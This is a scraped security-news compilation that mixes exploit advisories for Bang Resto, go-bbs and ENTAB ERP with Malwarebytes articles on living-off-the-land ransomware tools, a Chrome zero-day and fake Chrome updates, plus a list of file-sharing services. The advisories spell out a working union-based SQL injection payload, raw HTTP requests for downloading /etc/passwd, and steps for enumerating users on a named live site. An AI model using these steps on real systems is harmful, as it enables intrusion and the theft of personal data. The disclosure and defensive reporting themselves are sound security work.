AspEmail version 5.6.0.2 suffers from weak permission vulnerability that allows for local privilege escalation.

AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation

Bang Resto version 1.0 suffers from multiple SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty in December of 2022.

    # Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29849*Affected Parameters:*btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],itemqty[], btnMenuItemID*Steps to Reproduce:*1. First login your staff panel.2. then go to "order" menu and Select menu then create order and interceptrequest data using burp suite.so your request data will be:POST /bangresto/staff/displayitem.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 194Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/staff/order.phpCookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5Connection: closebtnMenuItemID=1&qty=13. "btnMenuItemID" parameter is vulnerable. Let's try to inject union basedSQL Injection use this query ".1 union select1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())---" in "btnMenuItemID" parameter.4. Check browser you will see user, database and version informations.

Bang Resto 1.0 SQL Injection

Bang Resto version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29848*Steps to Reproduce:*1. First login to your admin panel.2. then go to Menu section and click add new menu from group.your request data will be:POST /bangresto/admin/menu.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/admin/menu.phpCookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6Connection: closeitemName=test&itemPrice=1&menuID=1&addItem=3. Then use any XSS Payload in "itemName" parameter and click add.4. You will see XSS pop up.

Bang Resto 1.0 Cross Site Scripting

go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.

**Install**

1.  Download: git clone https://github.com/gobbscom/go-bbs.git
2.  Create a directory: cd go-bbs && mkdir conf
3.  Copy the configuration file: cp app.conf.example conf/app.conf
4.  Modify the database configuration
5.  Execute ./go-bbs --install to install the database,
6.  Finally execute ./go-bbs to access the corresponding port

**Vulnerability Description AND recurrence**

View routing API routers/router.go line 196  

Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer

    UserName: User
    PassWord: 123456
    

Check out router.go, follow up &home.LoginController{}, pass username and password to login  

    POST /login.html HTTP/1.1
    Host: 192.168.19.6:9090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 29
    
    username=user&password=123456
    

Credentials obtained: beegosessionID=***

The incoming URL needs to be AesDecrypt  

So you need to perform AesEncrypt on the downloaded path

    GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
    Host: 192.168.19.6:9090
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
    Connection: close
    
    
    

Use the credentials to access the downloaded API and successfully download /etc/passwd

CVE-2023-27755: go-bbs has an arbitrary file download vulnerability · Issue #10 · gobbscom/go-bbs

Categories: Business
Good tools gone bad.



(Read more...)




The post Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight appeared first on Malwarebytes Labs.

Regular readers of our monthly ransomware review (read our April edition here) know that Ransomware-as-a-Service (RaaS) gangs have been making headlines globally with their disruptive attacks on organizations.

Sometimes, though, it’s not enough to merely know about of the problem.

In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. If we know how RaaS gangs evade detection once in a network, for example, we may be able to kick them out before they can do any damage.

One of the most concerning behaviors we’ve observed from RaaS gangs is their use of **Living off the Land (LOTL) attacks, where attackers leverage legitimate tools to evade detection, steal data, and more.**

Let’s dive into the dangers of LOTL attacks in RaaS operations and provide guidance for under-resourced IT teams on how to detect and block such threats.

**The deceptive nature of LOTL attacks**

In an ideal world, IT teams whose organizations are under attack would have clear and direct evidence of the malicious activity.

For example, if unusual network connections are being made to remote IP addresses associated with known malicious actors, then there’s little doubt that you’re under attack—enabling IT to put a halt to the behavior early on.

But now imagine you're diligently monitoring a network for any signs of suspicious activity. As you scan a seemingly endless stream of logs, searching for any anomalies that could signal trouble, you notice some activity from PowerShell, a versatile and legitimate scripting tool.

_Script Block Logging records all blocks of code as they’re executed by PowerShell, which could you point to suspicious activity. Source._

Namely, there are **scripts using commands that an attacker _could_ use to steal data from the company’s network**, but which also resembled legitimate administrative tasks used by IT professionals for various system administration tasks. Considering it’s regular business hours, you figure it’s part of a routine IT maintenance operation and move on.

But, lo and behold, it was a RaaS gang the whole time!

The attacker had studied the company's environment and had a deep understanding of the tools and processes typically used by employees, and so they managed to avoid raising suspicion by blending in with typical PowerShell usage. By conducting the attack during normal business hours, the attackers also avoided any of the usual scrutiny that would come from moving across a network late at night. 

This is exactly why LOTL attacks are so dangerous: **by mimicking normal behavior, LOTL attacks make it extremely difficult for IT teams and security solutions to detect any signs of malicious activities.** Experienced analysts, however, might be able to pick up on subtle anomalies or patterns that indicate a LOTL attack, leveraging their expertise and deep understanding of system behaviors.

On the other hand, new or under-resourced teams may struggle to identify such attacks due to a lack of experience or insufficient tools, leaving them vulnerable to these stealthy threats.

**5 LOTL tools used by ransomware gangs **

While attackers use a seemingly innumerable amount of legitimate tools for LOTL attacks, below are five of the most common ones we've seen the most active ransomware gangs using for their attacks.

Tool

Used For

Used To

Used By

**PowerShell**

Versatile scripting language and shell framework for Windows systems

Execute malicious scripts, maintain persistence, and evade detection

LockBit, Vice Society, Royal, BianLian, ALPHV, Black Basta

**PsExec**

Lightweight command-line tool for executing processes on remote systems

Execute commands or payloads via a temporary Windows service

LockBit, Royal, ALPHV, Play, BlackByte

**WMI**

Admin feature for accessing and managing Windows system components

Execute malicious commands and payloads remotely

LockBit, Vice Society, Black Basta, Dark Power, Cl0p, BianLian

**Mimikatz**

Open source tool for Windows security and credential management

Extract credentials from memory and perform privilege escalation

LockBit, Black Basta, Cuba, ALPHV

**Cobalt Strike**

Commercial pen test to assess network security and simulate advanced threat actor tactics

Command and control, lateral movement, and exfiltration of sensitive data

LockBit, Black Basta, Royal, ALPHV, Play, Cuba, Vice Society

Again, readers of our monthly ransomware review will recognize that each gang listed here are responsible for the lion's share of yearly ransomware attacks.

**Advice for IT teams**

The four tips listed below, combined of cutting-edge technology and unique expertise, can greatly help IT teams uncover LOTL attacks:

**1\. Regularly monitor network traffic and logs**

*   Regularly analyze your network traffic for any unusual patterns or connections to known malicious IP addresses or domains associated with the use of tools like Chisel, Qakbot, or Cobalt Strike. 
*   Enable logging on critical systems (firewalls, servers, and endpoint devices) and regularly review logs for unusual activities or signs of compromise.

**2. Stay informed of the latest threat intelligence**

*   Leverage threat intelligence feeds to stay informed about new attack techniques, indicators of compromise (IOCs), and other relevant threat data.
*   Use this data to fine-tune your security monitoring, detection, and response capabilities to identify and mitigate LOTL attacks.

**3\. Leverage behavioral analysis and anomaly detection**

*   Implement advanced monitoring tools that focus on detecting unusual user or system behavior rather than relying solely on known signatures or patterns.
*   Machine learning and artificial intelligence can be leveraged to identify deviations from normal behavior, which might indicate an ongoing LOTL attack.

_Malwarebytes EDR observes the behaviors of processes, registry, file system, and network activity on the endpoint using a heuristic algorithm looking for deviations. Here you can see all detection rules triggered in the suspicious activity and their mapping to MITRE ATT&CK._

**4\. Restrict the abuse of legitimate tools**

*   Focus on managing and controlling the use of legitimate tools and system features often exploited in LOTL attacks.
*   Limit access to certain tools only to users who require them, monitoring their usage, and applying specific security policies to restrict potentially harmful actions.

In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper-hand against RaaS gangs that employ LOTL techniques.

**24x7 security monitoring and threat hunting for your organization**

Monitoring network traffic, enabling and reviewing logs, checking for anomaly detection, and implementing application control are essential steps for detecting and blocking malicious activity. However, these efforts often require around-the-clock coverage and deep cybersecurity expertise, which can be difficult for small and medium-sized organizations to maintain.

This is where Malwarebytes Managed Detection and Response (MDR) comes in.

**stop hidden threats**

Malwarebytes MDR analysts are experienced in detecting malicious use of legitimate tools and blocking attackers. They use their expertise to identify unusual patterns or connections to malicious IP addresses, domains, or unauthorized application usage related to the LOTL attacks conducted by the RaaS gangs.

By partnering with Malwarebytes MDR, businesses can enhance their security posture and gain peace of mind, knowing that a skilled team of security experts is working 24x7x365 to proactively detect and respond to potential threats. Find more MDR resources below!

*   **How to choose an MDR vendor: 6 questions to ask**
*   Is an outsourced SOC worth it? Looking at the ROI of MDR
*   **3 ways MDR can drive business growth for MSPs**
*   **Cyber threat hunting for SMBs: How MDR can help**

Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight

Categories: Exploits and vulnerabilities
Categories: News
Tags: Google

Tags:  Chrome zero-day

Tags:  CVE-2023-2033

Tags:  V8 flaw

Tags:  V8

Google has released an updated version of Chrome to address a zero-day flaw that is being exploited in the wild.



(Read more...)




The post Update Chrome now! Google patches actively exploited flaw appeared first on Malwarebytes Labs.

Posted: April 17, 2023 by

In a recent security advisory, Google says it patched a high-severity zero-day security flaw in its Chrome browser—the first in 2023—currently being exploited in the wild by threat actors. The company urges all its Windows, Mac, and Linux users to update to version **112.0.5615.121** immediately, as this flaw is present in Chrome versions before this one. Updating your browser can be done manually or automatically.

If you use other Chromium-based browsers, you may need to update them as well.

The vulnerability, tracked as **CVE-2023-2033**, is exploitable when a user visits a malicious webpage using an unpatched Chrome browser. The page could run arbitrary code in the browser, potentially leading to your computing device being hijacked. Google knows an exploit code for this flaw already exists and is circulating in the wild.

CVE-2023-2033 is a type-confusion bug in V8, Google's open-source JavaScript and WebAssembly engine. As with zero-day patch announcements, the company supplied little to no details on how attackers could exploit this flaw. However, we know that attacks on V8, although uncommon, are considered one of the most dangerous. Exploiting a weakness in V8 typically leads to a browser crashing.

"Access to bug details and links may be kept restricted until a majority of users are updated with a fix," says Google in the advisory. "We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed."

Google is giving all its Chrome users enough time to update to the latest version until technical details are released.

**How to manually update Chrome**

Google Chrome typically updates automatically. However, it's worth double checking. To check if your browser is up to date:

*   Click the three vertical dots at the upper right-hand side of the URL bar.
*    Select Help > About Google Chrome.

Simply doing this should trigger Chrome to update. Once done, the browser will ask you to relaunch. Click the button to confirm and complete the update process.

Google would never let users manually download and install a separate file to update Chrome. Scammers and threat actors have used this tactic many times in the past, and, for a time, it worked. Now and then, this tactic is adopted in a malicious campaign, to catch those who aren't familiar with how Chrome works or how Google updates its products.

Stay safe!

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

Update Chrome now! Google patches actively exploited flaw

Categories: News
Tags: chrome

Tags:  browser

Tags:  update

Tags:  fake

Tags:  malware

Tags:  monero

Tags:  miner

Tags:  cryptocurrency

Tags:  rogue

Tags:  hacked

Tags:  compromised

Tags:  site

Tags:  website

We take a look at a slew of hacked websites pushing fake Chrome updates which are Monero miner malware in disguise.



(Read more...)




The post Fake Chrome updates spread malware appeared first on Malwarebytes Labs.

Compromised websites are causing big headaches for Chrome users. A campaign running since November 2022 is using hacked sites to push fake web browser updates to potential victims.

Researcher Rintaro Koike says this campaign has now expanded to also target those who speak Korean, Spanish, and Japanese. Additionally, Bleeping Computer notes that some of the affected sites include news, stores, and adult portals. The attackers are likely to be primarily targeting sites based on vulnerability rather than content served. As a result, it’s difficult to predict where these bogus updates will appear next.

**How the fake update attack works**

Once a website is compromised, malicious JavaScript runs a script when an unsuspecting visitor lands on the page. If you’re deemed to be an “acceptable” target for the attack, then more scripts are downloaded and a fake update lies in your immediate future.

Potential victims are shown what appears to be a genuine web browser error of some sort, from inside the browser window. It says:

> UPDATE EXCEPTION
> 
> An error occurred in Chrome automatic update. Please install the update package manually later, or wait for the next automatic update.
> 
> ERR\_INSTALL\_INTERRUPT

A ZIP file is then automatically downloaded under the guise of a supposed Chrome update. If you’re familiar with how Chrome updates, you’d probably decide to delete the file at this point because this isn’t exactly normal. However, a lot of folks out there will probably panic at the sight of the ZIP, assume something has gone horribly wrong with their browser, and open it up.

Sadly, all you’d be doing when launching the file is executing a Monero miner. Monero miners are trojans which hog your computer's CPU to mine for cryptocurrency. The scammers try to get rich, at the same time as devoting your system resources to activities other than what they should be doing. In a worst case scenario, your device could overheat, experience slow down, or just crash.

Monero miners can be seen doing the rounds in everything from Linux malware to Windows botnets.

According to the researchers, in this case the malware attack also shuts down Windows Update and adds itself as an exclusion to Windows Defender, as well as “disrupting the communication of security products with their servers”. A desktop PC with a miner hiding under the hood, security tools broken, and updates turned off meaning the device is potentially going to become more insecure as time passes? Someone’s hit the Monero moneymaker on this occasion.

**How to update Chrome**

Updating your web browser, whether Chrome or something else, is incredibly easy to do. Most of the time it’s completely automatic, and potentially done entirely out of your field of view. You may be asked to configure the process just once, at first install, and then never have to think about it again. At best, you may open up your browser, see a message telling you that you’re now running the latest version, and then go back to not having to think about it.

Maybe the very hands off approach has a small part to play in why people download ZIPs like the above. We’re so used to never seeing updates take place that when we’re randomly told about it out of the blue, we assume it’s the real deal.

Either way, your web browser should _never_ ask you to download random ZIP files and install the contents. All of your browser updating is supposed to happen inside of the web browser.

To update your browser manually, or at least get a feel for how this process takes place:

*   Click the 3 vertical dots on the right hand side of your URL bar.
*   Select Help > About Google Chrome

From here, you can see which version of Chrome that you’re running. If an update _is_ waiting in the wings, it should start downloading automatically. Once the update is complete, you’re usually asked to relaunch the browser and complete the update process. The “What’s New” button option will also inform you about major changes to browser functionality.

Again: you should never have to download a file, ZIP, or anything else from a website in order to supposedly update your browser. Avoid these so-called updates, keep genuine updating restricted to the browser itself, and you should be fine.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Fake Chrome updates spread malware

By Waqas
Zippyshare is no longer available after the service announced its shutdown on March 30th, 2023.
This is a post from HackRead.com Read the original post: 10 Best Zippyshare Alternatives – Best File Sharing Services

****With Zippyshare no longer available, users are now in search of alternative file hosting services to meet their needs. In this article, we will explore the top 10 Zippyshare alternatives that users can consider for their file hosting requirements.****

Zippyshare (Zippyshare.com) was a file hosting and sharing website that launched in 2006 and allowed users to upload and share files with others. Zippyshare provided a platform for users to store and share various types of files, including documents, images, videos, audio files, and more.

The service also allowed users to upload files to Zippyshare and generate download links that could be shared with others to download files.

Zippyshare had been known for its simplicity and ease of use, allowing users to quickly upload and share files without the need for an account or registration. It had been commonly used for sharing files in forums, blogs, and other online platforms, as well as for personal file-sharing purposes.

****Zippyshare Quits Operation****

As of February 2023, Zippyshare.com had a staggering 45 million daily visitors. However, on March 19th, 2023, the platform sent shockwaves through its user base as it announced March 30th, 2023 to be its last day of service.

Zippyshare.com cited multiple reasons for its decision to shut down, including a decline in ad revenue, increasing competition, rising electricity costs, and the widespread use of ad blockers, which collectively led to a significant decline in earnings.

As Zippyshare.com has ceased its operations, visitors to the site are greeted with a brief farewell message conveying the platform’s closure.

“Hello weary wanderer, Here lies Zippyshare , once upon a time a fairly big file hosting site blessed with a loyal and loving community. Before you leave, consider whether any of the following services will make your onward journey somehow easier and safer. Farewell.”

****Zippyshare Alternatives****

The thing about the internet is that one service goes down another one comes up. As a result, users seeking alternative file hosting and sharing websites can consider the following options:

**1\. **Mediafire****

Mediafire is a cloud-based file hosting and sharing service that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, audio files, and more.

MediaFire offers both free and paid plans, with different features and storage limits. With a free account, users can upload and share files up to a certain storage limit, while paid plans offer larger storage limits, and additional features such as password protection, direct links, and ad-free file sharing.

Users can create accounts on MediaFire, upload files, and generate download links that can be shared with others. MediaFire also offers file management tools, such as file renaming, file deletion, and folder organization, to help users manage their uploaded files.

**2\. **Google Drive****

Google Drive is a widely used cloud storage service that allows users to store, share, and collaborate on files and folders. It offers up to 15GB of free storage per Google account and supports various file types, including documents, photos, videos, and more.

**3\. **Dropbox****

Dropbox is another popular cloud storage and file-sharing service that provides free and paid plans. It offers features such as file synchronization, file versioning, and sharing options with password protection and expiration dates. Dropbox also integrates with various third-party applications for enhanced functionality.

**4\. **Mega****

Mega is a cloud storage and file-sharing platform that offers end-to-end encryption for enhanced security. It provides free and paid plans with features like large file upload support, file versioning, and password protection for shared links.

**5\. **OneDrive****

OneDrive is a cloud storage and file-sharing service offered by Microsoft, which comes with free storage for Microsoft account holders. It allows users to store and share files and folders and offers features such as file synchronization, file versioning, and collaboration tools.

**6\. **4Shared****

4Shared is a file hosting and sharing website that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, music, and more. 4Shared allows users to create accounts, upload files, and generate download links that can be shared with others, facilitating file sharing and collaboration.

4Shared offers both free and paid plans, with different features and storage limits. It has been used for personal file sharing, online backup, and collaborative file sharing purposes. Users can also search for and access files shared by others on the 4Shared platform.

**7\. **FileFactory****

FileFactory is a cloud-based file hosting and sharing service that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, music, and more.

FileFactory allows users to create accounts, upload files, and generate download links that can be shared with others, facilitating file sharing and collaboration. FileFactory provides features such as file encryption, password protection, and download tracking to enhance file security and control. FileFactory offers both free and paid plans.

**8\. **AnonFiles****

AnonFiles is a file hosting and sharing website that allows users to upload and share files anonymously. It provides a platform for users to store and share various types of files, including documents, images, videos, audio files, and more. AnonFiles.com does not require users to create accounts or register, allowing for anonymous file sharing.

Users can upload files to AnonFiles and generate download links that can be shared with others, enabling them to download the files. AnonFiles.com also provides options for password protection and file expiration, allowing users to add additional security measures to their shared files.

**9\. **WeTransfer****

WeTransfer is a cloud-based file transfer service that allows users to send and share large files with others. It provides a simple and user-friendly interface for uploading and sending files, making it easy to share files with colleagues, clients, friends, or family.

WeTransfer offers a free plan that allows users to send files up to 2GB in size, with a limit of 20 transfers per week. Files are stored on WeTransfer’s servers for a limited time, typically 7 days, and users can choose to send files via email or by generating a download link that can be shared with others.

WeTransfer also offers a paid plan called WeTransfer Plus, which provides additional features such as increased file transfer size (up to 20GB), longer storage duration (up to 100GB), password protection for shared files, and customizable backgrounds for download pages, among others.

**10\. **pCloud****

pCloud is a cloud storage service that allows users to store, share, and synchronize files and data online. It provides a platform for users to upload, store, and access files, photos, videos, documents, and other types of data in the cloud, making them accessible from anywhere with an internet connection.

pCloud.com offers various features such as file syncing, file sharing, file versioning, and encryption to ensure data security and privacy. It also offers mobile apps for iOS and Android devices, as well as desktop apps for Windows, macOS, and Linux operating systems, making it convenient for users to access and manage their files across different devices.

pCloud.com offers both free and paid plans with different storage capacities and features to suit the needs of different users and businesses. Since the site is based in Europe, it fully complies with GDPR which means respect for user privacy and data protection.

****Beware of malicious files****

When downloading files from an email or any of the aforementioned Zippyshare alternatives, it’s important to be cautious of potentially malicious files. To ensure the safety of your device and data, always scan downloaded files using reputable antivirus software or online scanning services like VirusTotal, FileScan, or Any.Run.

This will help detect and mitigate any potential threats before they can harm your device or compromise your security. Stay vigilant and prioritize your cybersecurity when downloading files from any source, including file hosting and sharing websites.

****Conclusion****

These websites provide similar features such as uploading, storing, and sharing files with others, and may offer different plans, storage limits, and additional features. It’s important to review the terms of service and privacy policy of these websites to ensure compliance and up-to-date information.

1.  Tor and Its 10 Best Alternatives
2.  5 Best Internet Service Locators
3.  The Best Alternatives Operating Systems
4.  Tor domain remains online after Feds seize Z-Library sites
5.  Best legal, free online streaming sites for movies, TV shows

10 Best Zippyshare Alternatives – Best File Sharing Services

Categories: News
Tags: Lock and Code S04E09

Tags:  Bennett Cyphers

Tags:  Apple vulnerability

Tags:  phone charging station

Tags:  FBI

Tags:  Yum! Brands

Tags:  KFC

Tags:  Pizza Hut

Tags:  Patch Tuesday

Tags:  sextortion

Tags:  malvertising

Tags:  Weebly

Tags:  AI

Tags:  virtual kidnapping

Tags:  ransomware review

Tags:  ransomware in the UK

Tags:  ransomware in France 

The most interesting security related news from the week of April 10 - 16.



(Read more...)




The post A week in security (April 10 - 16) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (April 10 - 16)

ENTAB ERP 1.0 allows attackers to discover users' full names via a brute force attack with a series of student usernames such as s10000 through s20000. There is no rate limiting.

    Exploit Title: ENTAB ERP 1.0 - Username PII leakDate: 17.05.2022Exploit Author: Deb Prasad BanerjeeVendor Homepage: https://www.entab.inVersion: Entab ERP 1.0Tested on: Windows IISCVE: CVE-2022-30076Vulnerability Name: Broken Access control via Rate LimitsDescription:In the entab software in fapscampuscare.in, there is a login portal with aUserId field. An authenticated user would enter and get their name as wellas other services. However, there should be a rate limit in place, which isnot present. As a result, a hacker could bypass the system and obtain otherusernames via broken access control. This enables a threat actor toobain the complete full name and user ID of the person.POC:1. Go to fapscampuscare.in or any entab hosted software and find the entabsoftware.2. Use a proxy to intercept the request.3. Since it's a student login, try a random UserId (e.g., s11111).4. Intercept the request using Burp Suite and send it to the Intruder.5. Select payloads from number 100000-20000, and turn off URL encoding onthe UserId parameter.6. Start the attack and sort by length to obtain the username and full nameof other users.

Tag

#windows